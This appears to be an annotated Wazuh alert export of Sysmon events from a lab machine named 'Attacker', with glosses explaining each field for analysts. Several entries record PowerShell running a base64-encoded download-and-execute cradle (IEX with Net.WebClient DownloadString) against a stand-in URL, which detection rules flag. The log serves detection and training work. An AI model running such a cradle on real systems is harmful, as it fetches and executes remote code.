Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd72-680a-860b-000000000e00}
ParentProcessId: 15968
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:46.626 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd76-680a-890b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16036 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd72-680a-860b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 81 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534330.1719617 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:48.4891010Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284883 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:48.448
ProcessGuid: {94294ddc-bd76-680a-890b-000000000e00}
ProcessId: 16036
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_q0avipez.2ek.ps1
CreationUtcTime: 2025-04-24 22:38:48.445
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:48.448 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd76-680a-890b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16036 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_q0avipez.2ek.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:48.445 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 78 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534333.1722386 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:50.8815173Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284919 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:49.689
ProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00}
ProcessId: 3688
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd76-680a-890b-000000000e00}
ParentProcessId: 16036
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:49.689 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd79-680a-8b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3688 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd76-680a-890b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16036 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 82 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534333.1730453 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:51.0649204Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284920 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:51.047
ProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00}
ProcessId: 3688
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gguk2unw.kfw.ps1
CreationUtcTime: 2025-04-24 22:38:51.047
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:51.047 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd79-680a-8b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3688 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gguk2unw.kfw.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:51.047 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 79 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534335.1733218 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:53.6335273Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284943 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:52.123
ProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00}
ProcessId: 14828
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00}
ParentProcessId: 3688
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:52.123 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd7c-680a-8d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14828 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
